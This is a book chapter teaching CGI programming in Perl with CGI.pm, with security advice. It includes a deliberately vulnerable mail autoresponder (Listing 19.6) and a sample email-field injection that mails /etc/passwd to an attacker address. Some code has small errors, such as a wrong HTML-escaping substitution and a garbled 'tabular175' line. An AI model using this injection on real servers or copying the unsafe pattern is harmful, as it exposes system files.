UNIX Unleashed, Internet Edition

- 19 -

Developing CGIs with Perl

By Matt Curtin

There are some things worth mentioning when considering CGI in Perl. (Likely, these are reminders of things you have already learned.)

Perl puts its environment variables into the hash (sometimes known as "associative array") %ENV. To reference the environment variable home, you would then use $ENV{'HOME'}.
Much of this chapter will deal with using a Perl module known as CGI.pm, or one of its more task-specific friends. (Perl "modules" are analogous to C++ or Java "classes." These are simply components of the software that provide "methods" to your programs. Methods are just OO-speak for functions.)
Many of the code examples here are only "snippets," which need to be incorporated into CGI programs in order to actually run.

Why Perl?

Why not?

Actually, there are quite a few reasons to use Perl. Perl is a mature, portable, and flexible programming language. Such tasks as reading, writing, and mangling text are ideally done in Perl. A great deal of CGI programming is essentially text processing, sometimes in fairly creative ways, which makes Perl well-suited to the task of CGI programming. Additionally, there is a large base of free modules to make the task of CGI programming even easier, and many freely available programs which you can modify for your own needs, or learn new techniques. Let's consider some needs of CGI programs in more detail, and compare Perl with some other languages.

Requirements of a CGI Language

You can use just about any programming language to write CGI programs--Shell, Scheme, C, Java, you name it. If it's a real programming language, you can write CGI with it. Not that doing so is a good idea, but you can even write CGI programs using something like BASIC. The point is that there's a difference between a language you can use and a language that you should use.

The language that you use for CGI should fit the application, just as in any other programming task. Typically, CGI programs perform tasks such as pattern matching, interfacing to databases, and generating HTML dynamically. Perl is by far the most popular CGI programming language because it is suited so well to these types of tasks.

In the following sections, I briefly compare Perl to some other programming languages that you can use for CGI programming. I do so strictly from the perspective of the needs of good language for CGI programming.

Perl Versus UNIX Shell UNIX shell scripts tend to be highly portable across various platforms. A number of trade-offs exist, though, in that shell scripts tend to be much slower than the same script implemented in Perl, C, or some other language that performs compilation of the entire program before it can be executed. You can handle deficiencies in the shell's capability to perform serious file manipulation by using tools such as awk, but even awk has limitations that could be significant in a CGI environment (such as being able to have only one file open at a time). As a result, shell is typically useful only for the smallest of scripts, such as simple <ISINDEX> gateways to services such as finger, archie, or other command-line tools, where you're only interested in seeing the results. Even in these cases, if you want to manipulate the results, or convert them from standard text to HTML, perhaps making appropriate words links to related or explanatory pages, Perl becomes a better option.

Perl Versus C/C++ Some CGI programmers prefer to use C, often because it's simply what they know. CGI programs implemented in C suffer from a number of problems, though: they're more likely to be susceptible to bugs in string handling or memory management that might even turn out to be security bugs. C is a great language for implementing systems that were done in assembler before C came about (such as operating systems) because it is very fast and allows the programmer to perform very low-level functions from a higher-level language that is more portable (than assembler) across architecture types.

CGI programs implemented in C, however, require at least a recompile for the target platform. If you're making a jump from one type of system to another, rewriting some parts of the program might even be required. C forces the CGI programmer to deal with other tasks (such as memory management) that only get in the way of accomplishing the task at hand. Further, its capability to do pattern matching is far behind that of Perl's. True, you can add pattern matching functionality, but that's additional overhead that must be compiled into your CGI program, rather than simply being an internal function, as it is in Perl.

I wouldn't implement an operating system in Perl (although I'm sure some people would), and I wouldn't implement a CGI program in C (although some do). Use the right tool for the job.

Perl Versus Java The entire world has become abuzz with talk of Java. For this reason, some programmers have tried to use Java for everything, including CGI. Doing so presents a number of advantages; however, they currently seem to be outweighed by the consequences. Java's strengths include portability and simplicity. Remember, though, that data is passed to a CGI application through the operating system's environment. As Java does not support access to environment variables (because of portability issues), a programmer needs to write a wrapper that will read the environment, and then invoke the Java program using a command-line interface, with the appropriate environment variables defined as properties.

Java is very much in the same boat as C when it comes to functionality. Although the Java programmer is significantly less inclined to cause bugs due to silly errors than the C programmer is, the Java programmer ends up having to implement nearly everything himself or herself either in the CGI program, or having to distribute a number of requisite classes along with the program. Much of the promise of Java has already been fulfilled in Perl, especially in the realm of CGI programming. Unless Java does some job much better than Perl, relating specifically to the program you're planning to develop, Perl is a much better language for CGI programming.

If you do have a task to perform that really is best done in Java, it's probably best to not use CGI, but rather "servlets," or some other server-specific API. Of course, in doing this, you might lose the server-portability that you have in using CGI.

How Perl Does CGI

Some basic understanding of Perl does CGI will be useful before we go forward. If you're already experienced with CGI programming, you might like to skip ahead to the next section, or glance over this section, looking for reminders.

Making the Server Able to Run Your Program

Remember, before a CGI program can run, several things will need to have taken place:

The HTTP server will need to have been told that your program is a CGI program, either by the directory it's under (such as somewhere under cgi-bin), or the file extension (such as .pl or .cgi). Consult your server's documentation for how to do this.
The operating system will have to allow its execution. This requires that the "execute bit" be turned on for the CGI program file. This can be done with the chmod(1) command, like

	chmod +x myprogram.pl

The location of the Perl interpreter must be specified in the first line of code. In all of these examples, I use /usr/bin/perl. If Perl is installed somewhere else on your system, either change the first line to have the correct path to the Perl interpreter, or create a symbolic link so that /usr/bin/perl will reference the correct file. Incidentally, this is also the line that important flags such as -T and -w need to be specified if you choose to do so. (Use of these flags is considered later.)

Some Examples

At this point, it would be useful to consider some example CGI programs. Remember, the web browser will need to be told the content type of the data coming its way in the HTTP header. Once this has been done, the data itself can come down, and will be interpreted properly by the browser. In the case of HTML, you'll need to have the HTTP header indicate the content type as text/html, send two newlines (to mark the end of the header and the beginning of the data), and then the HTML.

Your First CGI Program in Perl Of course, the classic first program in any language is "Hello, world!" Likely, you've already seen this in Perl. In Listing 19.1, you'll see it again, with a twist: it's a CGI program.

Listing 19.1. "Hello, world"

#!/usr/bin/perl -Tw

print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML//EN\">
<html>
  <head>
    <title>Hello, world!</title>
  </head>

  <body>
    <h1>Hello, world!</h1>
  </body>
</html>
EOD

Note the double newline between the last HTTP header (Content-type: text/html) and the first line of data (<html>). If you're missing this, your program will not work properly.

Of course, this isn't really very interesting, since we could have achieved the same result by writing a standard HTML file. However, the power of CGI becomes a bit more obvious when looking at something slightly more fancy: tell the user the result of the uptime(1) command, which is what we do in listing 19.2.

Listing 19.2. Fancy "hello, world"

#!/usr/bin/perl -Tw

$ENV{'PATH'} = "";

$|=1;

print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML//EN\">
<html>
  <head>
    <title>Fancy hello world!</title>
  </head>

  <body>
    <h1>Hello world!</h1>
    How long has this system been up?
    <pre>
EOD
  system("/usr/bin/uptime"); # for Solaris, *BSD, Linux
  # system("/usr/bsd/uptime"); # for IRIX
print <<EOD;
    </pre>
  </body>
</html>
EOD

echo.pl: Seeing CGI Environment Variables Listing 19.3 has another program that should prove to be interesting: a Perl version of the popular echo.sh program that has come with a number of different HTTP servers, including NCSA's HTTPd and Apache. We're simply walking through the %ENV hash, and returning each key (environment variable), and its value, as a plain text file.

Listing 19.3. Perl Translation of echo.sh
#!/usr/bin/perl -Tw

print "Content-type: text/plain\n\n";

foreach $key(keys %ENV) {
  print "$key=$ENV{$key}\n";
}

Listing 19.4 is the same thing, except a bit fancier, using HTML tables:

Listing 19.4. Fancy CGI Environment Viewer

#!/usr/bin/perl -Tw

print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML//EN\">
<html>
  <head>
    <title>What's our environment, anyway?</title>
  </head>

  <body>
    <h1>What's our environment, anyway?</h1>
    <table border>
      <caption>Environment variables and their values</caption>
      <TR>
        <th>Variable</th>
        <th>Value</th>
      </TR>
EOD

  foreach $key(sort keys %ENV) {
    print "<tr><td> $key </td><td> $ENV{$key} </td></tr> \n";
  }

print <<EOD;
    </table>
  </body>
</html>

EOD

perldoc.pl: A Web Front-End to perldoc(1) Now let's invent a problem that might actually exist. You have found perldoc(1) to be incredibly useful. You would like to be able to use it from home, but don't want to do so through a telnet(1) window; you'd rather use your browser.

This is an easy task. The next listing shows a very simple <ISINDEX> interface to the perldoc(1) command, which demonstrates simple text processing and handling of (potentially dangerous) user input.

Notice the URL when perldoc.pl is run the first time. Then submit a query, and notice the URL. Your submission becomes part of the URL, in the query string. To perform the lookup of the submitted command, we run it through a regular expression and then use a back reference to assign the value of the query string to $query. Remember, input from users is potentially dangerous, so we need to be sure that we're not allowing shell metacharacters anywhere near a shell. The regular expression /^(\w+)$/ will ensure that only alphanumeric characters are left in the variable. However, Perl's -T switch will still flag this data as "tainted", that is, untrusted, and potentially dangerous. By assigning the value to a new variable with the back reference $1, we tell Perl that we know what we're doing, so, Perl allows us to proceed.

(As an aside, it's noteworthy that the result of a perldoc(1) request is in the same format as a man(1) request: nroff with man macros. Because of this, only minor modifications are needed to perldoc.pl to create a front end to man(1). Why not give that a try?)

Listing 19.5. Webified `perldoc(1)`

#!/usr/bin/perl -T

$ENV{'PATH'} = "/bin:/usr/bin:/usr/local/bin";

$ENV{'QUERY_STRING'} =~ /^(\w+)$/; # matches only alphanumerics and _
$query = $1;		   # tell perl not to worry, we've detainted

print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML//EN\">
<html>
<head>
</head>
<body bgcolor=\"#ffffff\">
  <title>perldoc $query</title>
  <center>
  <h1><code>perldoc</code> Interface</h1>
  </center>
  <isindex>
  <h2>$query</h2>
  <pre>
EOD

# Don't bother running the command if there's no argument
if ($query) {
  open(PERLDOC, "/usr/local/bin/perldoc $query |") || die "Cannot perform perldoc query!";
  while(<PERLDOC>) {
    s/.\ch//g;
    s/</&lt;/g;
    s/</&gt;/g;
    print;
  }
}

close PERLDOC;

print <<EOD;
  </pre>
  <hr>
  <address><a href=\"http://www.research.megasoft.com/people/cmcurtin/\">C 
Matthew Curtin</a></address>
</body>
</html>
EOD

At this point, you should have some understanding of how Perl works with CGI. You can imagine a number of things that we haven't covered yet, like how to handle cookies, process more complex user input, forms, and so on. Even potentially difficult tasks are made quite a bit more simple with the CGI.pm module. We'll cover its use through the rest of the chapter.

CGI Programming Concerns

Would you connect your machine to the Internet if you knew that doing so would enable people to run commands on your machine? What if that machine has all your personal and private data on it? What if that machine is your company's Web server?

Well, keep in mind that's exactly what CGI is. A remote user, most often someone who hasn't gone through any kind of authentication--and someone who can't easily be tracked down (if at all)--is running programs on your Web server. I can't emphasize enough that this situation can be very dangerous. So let me say again: This situation can be very dangerous.

CGI is dangerous.

The nice thing about CGI on your Web server is that the programs that people are running on your machine are programs you've written. (You have control over what's on your server and what it can and can't do.) The bad thing about CGI on your Web server is that the programs that people are running on your machine are programs you've written. (Although you might write programs that are very nice and that do only what you want them to, you might be surprised to find out what else a naughty person can make them do.)

Trust Nothing

Consider the code in Listing 19.6. This little CGI program, which is sitting on your company's Web server, is called when a user enters an e-mail address to get more information about your company's New SuperWidgets.

Listing 19.6. SuperWidget Autoresponder.

#!/usr/bin/perl

use CGI;

$query = new CGI;
$email_addr = $query->param('email');

open(MAIL, "| Mail -s 'More information' $email_addr");

print MAIL <<EOD;
Thank you for your request.

Here at The Very Big Corporation of America, we think that
our SuperWidgets(tm) are pretty cool, and we hope you agree.

Sincerely,

Joe Mama
President, and Chief Executing Officer

EOD

Isn't that easy? Isn't Perl great? Now, you can just slap this bad boy up on the server, and you're all done. Right? Wrong. Sure, the program can do what you think it will, but it might also do something you haven't thought about. If someone claims that his e-mail address is something like

sillyname@sillyplace.com ; /bin/mail badboy@naughty.no < /etc/passwd

you might have a bit of a problem. Namely, badboy@naughty.no just got a copy of your password file. Oops.

The lesson here is obvious: don't trust any input from users. Remember, CGI programs are programs that run on your server. If these programs can be fooled into performing a task beyond what you've anticipated, you can have very serious security problems. Fortunately, Perl has an extremely useful -T switch, which would tell you about the vulnerability here and refuse to run. Don't even think about running a CGI program without specifying the -T switch. This is done by adding it to the end of the line specifying the path to Perl, making it look like:

  #!/usr/bin/perl -T

You especially need to consider this situation if you have any sort of "secure" service on the server, such as forms served by SSL that are used to get credit card numbers or other sensitive data from customers or partners. The more data that you have on the machine that is attractive to bad guys, the greater resources that they'll spend trying to get at what you're attempting to hide.

Another important consideration is that you don't really know what you're talking to on the other side of that connection. It might not be a browser at all, but rather someone who used telnet to talk to your HTTP port, attempting to interact with your daemon or programs in ways you haven't thought about. You have good reason to be paranoid about this problem.

Common Pitfalls with CGI Programs in Perl

Perl is a wonderfully powerful language. You do need to be careful while writing CGI programs to avoid common pitfalls, however. Some of them are related to functionality, whereas others are related to security. Keep them all in mind, and remember to make your programs functional and secure. Now take a look at some of my favorite pitfalls:

Passing unsafe data to shells
This problem is, by far, the worst for new (and careless) Perl programmers. An example is cited in listing 19.6. Listing 19.5 also had potential for that, since we used a shell (when we opened the PERLDOC file handle), but our handling of $ENV{'QUERY_STRING'} and turning it into $query took care of this problem. If you possibly can, you're almost always best off avoiding the use of shells in CGI programs.
Making assumptions about the environment
Many people write programs assuming that other programs and files in the system will be where they are on their system. In practice, programs and configuration files might be in another place, or not even exist, on an operating system from another vendor. In making such assumptions, Perl's extreme portability is hindered, and you have to rework the programs when moving from one environment to another. I like to keep dependencies on external resources (such as the shell or underlying UNIX commands) to a minimum, not using them at all unless I can't avoid doing so for some reason, which is a pretty rare event. (However, in listing 19.5, you'll note that we did. In this case, the program would have become more complex to avoid using the shell, so it made more sense to just use a shell, and detaint the user's input ourselves.)
Having file permission problems
Remember, the program is going to be run under the UID of the HTTP daemon on your system. You need to be sure that the HTTP daemon has read access to the program, that the program has the execute bit turned on, and that any files that will be read, written, created, or deleted can have whatever you need done to them under the UID of the HTTP daemon.
Failing to perform sufficient error checking
Do yourself a favor, and check for error conditions. When your program encounters an unexpected error on an open() or fork() or anything else, rather than have it silently stop working, use die() to make it complain loudly about the problem. Notice how listing 19.5 uses die() with the open(). If perldoc isn't in /usr/local/bin/, or if some other error occurs, use of that die() could save you a lot of time hunting down and eradicating the problem.
Not taking advantage of useful Perl options
Here's a fun way to waste lots of time trying to find stupid mistakes. We've already mentioned -T, but let me emphasize again: don't ever run CGI Perl programs without it. Also, another useful switch is -w. This will give you warnings about potential problems in your code. Never test code without -w specified. If you are getting warnings when -w is specified, you're best off solving them, not making them "go away" by removing -w. On the other hand, if you are getting a warning, you know what it means, why it's being made, and that it won't create problems for you, it might be all right to remove -w when moving your program to production.
Not taking advantage of useful Perl modules
Much of the work in providing interfaces to data, parsing capabilities, and so on already exists. Instead of having to implement them, you'll be much more productive using that which is already available. You should definitely use the several extremely cool CGI Perl modules if you're writing any CGI that's more than a few lines long. In fact, if you don't have CGI.pm, go get it right now. I can wait. Done? Good, you're going to need it in the next section.
Forgetting to flush STDOUT
Good CGI programmers tell their programs to flush the STDOUT output buffer after each write. This way, the MIME type gets out (and the browser can see it) before the program goes down in flames. (This is done by setting $| to a nonzero value. Notice listing 19.2. Comment out the line where I set the value of $| and the run the program again. See the difference? When the output buffered, the result of uptime(1) is returned before the rest of the program's output. This is clearly bad, so be sure to set $| to something nonzero for your CGI programs.)

Introduction to `CGI.pm`

Using CGI.pm

Using CGI.pm is easy. To write a CGI program, you simply need to create a new CGI object, throw some parameters at it, and a new CGI program is born. Now take a look at some code snippets, and see what each one does.

You create a new CGI object just as you would create any other Perl object:

use CGI;
$cgi = new CGI;

You can also create CGI objects and feed them parameters at the same time. For example, if you want to send some parameters in via an open file handle, you simply need to reference the file handle glob you want. It can be STDIN, some file with key/value pairs used for debugging, or just about anything else, as you can see here:

$cgi = new CGI(\*STDIN);

(In reality, you could just use the file handle name, but passing the glob reference is the official method of passing file handles, which is why I show it here. The * character, in this context, is often known as a "glob", a wildcard character that will match anything. Hence, a "globbed" file handle like *STDIN will include $STDIN, @STDIN, and %STDIN.)

Additionally, you can hardwire associative array key/value pairs into the new object being created this way:

$cgi = new CGI({    'king' => 'Arthur',
                   'brave' => 'Lancelot',
                  'others' => [qw/Robin Gallahad/],
                 'servant' => 'Patsy'});

Another useful initialization option is to pass a URL style query string, as follows:

$cgi = new CGI('name=lancelot&favoritecolor=blue');
And, of course, you can create a new CGI object with no values defined:
$cgi = new CGI('');

When to Use `CGI.pm`

As with all tasks when you're programming in Perl, you can find more than one way to do the job. In my experience, if the program is more complex than what can be reasonably accomplished in a few lines of code, or will require the parsing of input from the user that is more complex than what can be obtained through environment variables, then using CGI.pm is the way to go.

In the first example, in which the user's browser type is checked, doing the job without CGI.pm is just as easy doing it with CGI.pm. In such cases, I typically do not use CGI.pm. These times are fairly rare, however; most of the time you use CGI, you do so because someone wants to give some level of feedback to the server, which means that the server needs to be able read the data and make it useful.

Sometimes you might need a specific part of CGI.pm but don't want the whole thing, perhaps because you're optimizing for speed, or don't want to use the extra memory of the whole CGI.pm module. In these cases, you can use a number of related modules geared toward more specific tasks to give you some of the features you're looking for in CGI.pm without the overhead.

You can find the WWW-related modules (including CGI) on the Web at

http://www.perl.org/CPAN/modules/by-category/15_World_Wide_Web_HTML_HTTP_CGI/

In the end, most often you'll find using CGI.pm or a related CGI module more advantageous than doing the work yourself. In addition to CGI.pm's convenience, there are some extra security checks to help keep you from being caught doing stupid things. Use the tools available, unless the job is so small that they'll make more work for you.

Some CGI.pm Methods

In this section, I've included examples to highlight some of the features that I've found particularly useful in CGI.pm. Check the documentation for the complete (and current) list of available features. I hope that the information I present here is enough for you to understand how CGI.pm works so that when you see other features in the documentation, you'll be able to begin using them quickly.

Much of this section has been adapted from the CGI.pm documentation, by

Lincoln Stein

<lstein@genome.wi.mit.edu>

http://www.genome.wi.mit.edu/~lstein/

and has been used with permission.

keywords()
You can fetch a list of keywords from an <ISINDEX> query by using the keywords() method. For example,

@keywords = $cgi->keywords

param()
You use this method to get and set the names and values of parameters. If you need to know all the parameters (that is, their names) that were passed to your program, you can use the param() method this way:

@params = $cgi->param

To get the value of a given parameter, simply pass the name of the parameter whose value you want to fetch to the param() method. If more than one value is available for the given parameter, the method returns an array; otherwise, it returns a scalar.

      $value = $cgi->param('foo');  # for scalars
           @values = $cgi->param('foo'); # for arrays

Setting values is similarly easy. Passing an array to the parameter results in your having a multivalued parameter. This capability is useful for a number of purposes: initializing elements of a fill-out form, changing the value of a field after it has already been set, and so on.

      $cgi->param(  -name => 'foo',
                       -values => ['first', 'second', 'third', 'etc.']);

append()
If you need to add information to a parameter, you can use the append() method as follows:

      $cgi->append(  -name => 'foo',
                        -values => ['some', 'more', 'stuff']);

delete()
This method, as the name suggests, deletes a parameter.

      $cgi->delete('foo');

delete_all()
This method deletes all parameters, leaving an empty CGI object.

      $cgi->delete_all();

Importing `CGI.pm` Methods into the Current Namespace

The use CGI statement imports method names into the current namespace. If you want to import only specific methods, you may do so as follows:

use CGI qw(header start_html end_html);

It's possible that you'll want to import groups of methods into the current namespace rather than individual methods on a one-by-one basis. Simply specify which method family you want this way:

use CGI qw(:cgi :form :html2);

Be aware, however, that this makes the source code a bit more difficult to follow for someone else. Additionally, this isn't considered "good OO" practice. By importing the methods directly into your current namespace, it will be much more difficult to maintain and expand the program. Should you find yourself in a situation where you want to use more than one CGI object, for example, it will become confusing to keep track of which object you're referencing. Consider yourself warned.

The following are the method families available for you to use:

:cgi
These tags support the CGI protocol, including param(), path_info(), cookie(), request_method(), header(), and so on.
:form
All the form-generating methods live here.
:html2
html2 shortcuts such as br(), p(), and so on are here, as well as close-enough-to html2 methods such as start_html() and end_html().
:html3
html3.2 tags such as html3 tables live here.
:netscape
Netscape-isms that aren't html3 are here. Some examples are frameset(), blink(), and center().
:html
This family is a union of html2, html3, and Netscape.
:standard
This family is a union of html2, form, and cgi.
:all
This family is a union of everything.

If you want to use a tag that someone implements, you can do so and still use it in your local namespace by using the :any method family, as in the following example. Using this family causes any unrecognized method to be interpreted as a new HTML tag. Beware that typos are interpreted as new tags.

use CGI qw(:any :all);
     $q=new CGI;
     print $q->newtag({     parameter=>'value',
                       otherParameter=>'anotherValue'});

Saving State via Self-Referencing URL

A simple way of saving the state information is to use the self_url() method, which returns a redirect URL that reinvokes the program with all its state information. Here's the syntax:

$my_url = $cgi->self_url;
You can get the URL without all of the query string appended by using the url() method instead:
$my_url = $cgi->url;

Another method of saving state information is to use cookies. I talk about how to use them later in the chapter.

CGI Functions That Take Multiple Arguments

Although I provided an example like the following already, it's important enough to emphasize. If you want to create a text input field, for example, you can do so like this:

$field = $cgi->textfield(   -name => 'IQ',
                         -default => '160');
A nice side effect of being able to pass these specified arguments to a function 
is that you can give arguments to tags, even if the CGI module doesn't know about them. 
For example, if in some future version of HTML, the align argument is recognized, you can 
simply start using it like this:
$file = $cgi->textfield(   -name => 'IQ',
                        -default => '160',
                          -align => 'right');

HTTP Headers

The header() method, as shown here, prints out the appropriate HTTP header and a blank line beneath (to separate the header from the document itself). If no argument is given, the default type of text/html is used.

print $cgi->header('text/html');

You can specify additional header information the same way you pass multiple arguments to any object:

print $cgi->header(   -type => 'text/html',
                    -status => '',
                   -expires => '+1h',
                    -cookie => $my_chocolate_chip);
You can even make up your own as in the following example:
print $cgi->header( -type => 'text/html',
                   -motto => 'Live Free or Die!');

Of course, making up your own header doesn't have much point because usually the only thing that sees the headers is a browser. However, that does mean that if a new version of HTTP is released and has headers that you want to use, you can do so without waiting for a new version of CGI.pm.

You can specify the following:

-type
This is the MIME type of the document that the CGI program returns. In this case, it's text/html. Any MIME type is valid here.
-status
This optional field is the HTTP status code. You might want to use it if your CGI returns cached information that it gets from other servers; here's an example:

      print $cgi->header( -type => 'text/html',
                              -status=> '203 Non-Authoritative Information');

-expires
Generally, browsers don't cache the results of CGI programs, but some naughty browsers might, and sometimes proxy servers do also. You can limit the amount of time that such dynamically generated pages will be cached through this mechanism as follows:

      tabular175

-cookie
You can use this parameter to generate a header that tells Netscape (and browsers that wish they were Netscape, like Internet Explorer) to return a cookie for each request made of this program. You can use the cookie() method to create and retrieve session cookies.
redirect()
You can send a redirection request for the remote client, which immediately goes to the specified URL. (You should always specify absolute URLs in redirections; relative URLs do not work properly.)

      print $cgi->redirect('http://my.other.server/and/then/some/path');

HTTP Session Variables

Most of the environment variables that you use in creating CGI programs, including the ones discussed at the beginning of this chapter, are available through this interface. A list of methods follows, along with a brief description of each.

accept()
This method returns the list of MIME types that the remote client accepts. If you give this method a MIME type as an argument, (for example, $cgi->accept('image/gif'), it returns a floating-point value ranging from 0.0 ("Don't want it") to 1.0 ("Okay, I'll take that") that tells you whether the browser wants it.)
auth_type()
If the page is protected by an authentication scheme, the authorization type is returned. In HTTP/1.0, the only possible type of authentication is "basic". In HTTP/1.1, this could be either "basic" or "digest". Other server-specific schemes might be possible; consult your HTTP server's documentation to be sure.
raw_cookie()
This method returns a Netscape magic cookie in its raw state. Typically, you can perform any cookie manipulation that you might want to do at a higher level via the cookie() method.
path_info()
This method returns any path information that has been appended to your program in the HTTP request. For example, if your program performs redirects, and it is invoked using the path /cgi-bin/programname/some/other/path, then path_info() returns /some/other/path.
path_translated()
This method is the same as path_info(), except that path information is translated into the physical pathname, such as /var/www/cgi-bin/programname/some/other/path.
query_string()
This method returns the path information that has been appended to your program. This information could include options and arguments that you might use for maintaining state information.
referer()
This method returns the URL of the page that linked the user to your program.
remote_addr()
This method returns the IP address of the remote host (that is, the client) in dotted-quad form.
remote_ident()
This method returns the identity of the person on the remote host making the request. This method works only if the remote system has the identd service running.
remote_host()
This method returns the name of the remote host, if it is known. Otherwise, it returns the IP address.
remote_user()
This method returns the name of the user who has been authenticated on your server.
request_method()
This method returns the HTTP method used to request your program's URL (for example, GET, POST, or HEAD).
script_name()
This method returns the program name as a partial URL. This method is useful for programs that reference themselves.
server_name()
This method returns the name of the server on which the program is running.
server_port()
This method returns the port number that the local Web server is using.
user_agent()
This method returns the remote user's client software identification. You might be interested in watching this response to see how many browsers claim to be Mozilla (Netscape Navigator).
user_name()
This method returns the remote user's name. This method typically doesn't work, although it does work on some older browsers such as early versions of NCSA Mosaic.

HTML from `CGI.pm`

Now you're ready to look at some useful parameters to create HTML headers and the HTML document itself:

-title
This parameter indicates the title of the document. (The argument to this parameter ends up between the <TITLE> and </TITLE> tags.)
-author
This parameter indicates the author's e-mail address.
-script
You use this parameter to incorporate JavaScript into your HTML. Here you need to define all the JavaScript methods that you intend to use at the occurrence of events (such as the submission of a form, the changing of contents of a field, and so on). You learn how to invoke the methods defined here in the section on JavaScript.
CGI.pm doesn't write the JavaScript for you; it simply provides a way for you to incorporate JavaScript into your dynamically generated HTML. To use so, you need to know how to use JavaScript. Consider this example:

      $cgi = new CGI;
           print $cgi->header;

           $JAVASCRIPT=<<END;
           // This is a super simple example of incorporating JavaScript in a
           // dynamically generated HTML page.

           window.alert("Click on OK!");
           END

           print $cgi->start_html( -title => 'Some sort of silliness',
                                  -script => $JAVASCRIPT);

Unpaired HTML Tags

You create tags that are unpaired such as <BR>, <HR>, and <P> as follows:

print $cgi->p;

Paired HTML Tags

Other tags, such as <I> and <B> are paired. You create them like this:

print $cgi->i("Here is some text to be italicized.");

You can even embed tags within tags as follows:

print $cgi->i("Here is some", print $cgi->b("bold text"), "to be italicized");

Some Pitfalls to Avoid

Although you can use almost any of the HTML tags that you might expect via lowercase function calls of the same name, in some cases they conflict with other methods in the current namespace.

You might want to make a <TR> tag, for example, but tr() already exists in Perl as a character translator. You therefore can use TR() to generate the <TR> tag. Also, you make the <PARAM> tag via the PARAM() method because param() is a method of the CGI module itself.

HTML Fill-Out Forms

Remember, the methods for creating forms return the necessary HTML-marked-up text to make the browser display that you want. You still need to print the strings after you get them from the methods. Also, the default values that you specify for a form are valid only the first time that the program is invoked. If you're passing any values via the query string, the program uses them, even if the values are blank.

You can use the param() method to set a field's value specifically if you want to do so. (You might want to use this method to ignore what might be in the query string and set it to another value you want.) If you want to force the program to use its default value for a given field, you can do so by using the -override parameter.

So, this bit of CGI

print $cgi->textfield(-name    => 'browser',
                      -default => 'Mozilla');

uses the value Mozilla in the browser text field the first time it's invoked. However, if the query string includes browser=InternetExploder, then the text field uses this value instead.

To prevent this situation from happening, you can change your CGI to look like this:

print $cgi->textfield(    -name => 'browser',
                       -default => 'Mozilla',
                      -override => 1);

Now, the text field always has the default value of Mozilla, regardless of the value in the query string.

If you want to force defaults for all fields on the page without having to specifically tell each one to override values from the query string, you can use the defaults() method to create a defaults button, or you can construct your program in such a way that it never passes a query string back to itself.

Although you can put more than one form on a page, keeping track of more than one at a time isn't easy.

Text that you pass to form elements is escaped. You therefore can use <my@email.addr>, for example, without having to worry about it somehow being sent to the browser, which would think that you've just sent it a strange tag. If you need to turn off this feature (so that you can use special HTML characters such as © ([cw]), then you can do so this way:

$cgi->autoEscape(undef);

To turn the feature back on, try the following:

$cgi->autoEscape('yes');

`<ISINDEX>`

To create an <ISINDEX> tag, you can use the isindex() method as follows:

print $cgi->isindex($action);

Starting and Ending Forms

The startform() and endform() methods exist so that you can start and end forms as follows:

print $cgi->startform($method, $action, $encoding);
     print $cgi->endform;

Two types of encoding are available:

application/x-www-form-urlencoded
This approach is the standard way of submitting data to a server-based form.
multipart/form-data
You can use this new encoding option, introduced in Netscape 2.0, to send large files to the server. It's useful for Netscape's file upload feature within forms. You really don't need to use this encoding method if you're not going to use the file upload feature of browsers.

Additionally, you can use JavaScript in your forms by passing the -name and -onSubmit parameters. (A good use of this feature is validation of form data before submission to the server.) A JavaScript button that allows the submission should return a value of true because a false return code aborts the submission.

Creating a Text Field

The textfield() method, shown here, returns a single-line text input field. -name is the name of the field, -default is the default value for the field, -size is the size of the field in characters, and -maxlength is the maximum number of characters that can be put into the field.

print $cgi->textfield(     -name => 'hours',
                        -default => 40,
                           -size => 3,
                      -maxlength => 4);
Creating a Multi-Line Text Area
You can create a multi-line text area as follows:
print $cgi->textarea(   -name => 'comments',
                     -default => 'My, what great stuff you have!',
                        -rows => 5,
                     -columns => 50);

Password Field

password_field() is the same as textfield(), except that asterisks appear in place of the user's actual keystrokes.

File Upload Field

The following method returns a form field that prompts the user to upload a file to the Web server:

print $cgi->filefield(     -name => 'passwd_file',
                        -default => 'Some value',
                           -size => 16384,
                      -maxlength => 32768);

-name is required for the field, -default is the starting value, -size is the size of the field in characters, and -maxlength is the maximum number of characters that can be submitted.

You should use the multipart form encoding for uploading files. You can do so by using the start_multipart_form() method or by specifying $CGI::MULTIPART as the encoding type. If multipart encoding is not selected, the name of the file that the user selected for upload is available, but its contents are not.

Remember, you can use the query() method to get the name of the file. Conveniently, the filename returned is also a file handle. As a result, you can read the contents of a file that the user uploaded with code like the following:

$uploaded_file = $cgi->param('uploaded_file');

     while(<$uploaded_file>) {
       print;
     }
Binary data isn't too happy with this kind of while loop, though. In fact, if you 
want to save the user-uploaded file someplace, as you would if the user were uploading, 
for example, a JPEG image of a new car, you might do so with some code like this:
     open(NEWFILE, ">>/some/path/to/a/file") || die "Cannot open NEWFILE: $!\n";
     while($bytesread=read($uploaded_file, $buffer, 1024)) {
       print NEWFILE $buffer;
     }
     close NEWFILE;

Pop-Up Menus

You can use the popup_menu() method to create a menu. -name is the menu's name (required), and -values is an array reference containing the menu's list items. You can either pass an anonymous array, or a reference to an array, such as menu_items (required). -default is the name of the default menu choice (optional). -labels lets you pass an associative array reference to name the labels that the user sees for menu items. If unspecified, the values from -values are visible to the user (optional).

print $cgi->popup_menu(   -name =>'menu_name',
                        -values =>['one', 'two', 'three'],
                       -default =>'three',
                        -labels =>{'one'=>'first','two'=>'second',
                                 'three'=>'third'});
Scrolling Lists
The method for creating scrolling lists is, of course, scrolling_list():
print $cgi->scrolling_list(    -name=>'list_name',
                             -values=>['one', 'two', 'three'],
                            -default=>['one', 'three'],
                               -size=>4,
                           -multiple=>'true',
                             -labels=>\%labels);

-name and -values are the same as they are in pop-up menus. All other parameters are optional. -default is a list of items (or single item) to be selected by default. -size is the display size of the list. -multiple, when set to true, allows multiple selections. Otherwise, only one item can be selected at a time. -labels is the same as it is for pop-up menus.

Check Boxes

You use the checkbox() method to create standalone check boxes. If you have a group of check boxes that are logically linked together, you can use checkbox_group().

print $cgi->checkbox(   -name=>'checkbox_name',
                     -checked=>'checked',
                       -value=>'ON',
                       -label=>'Check me!');

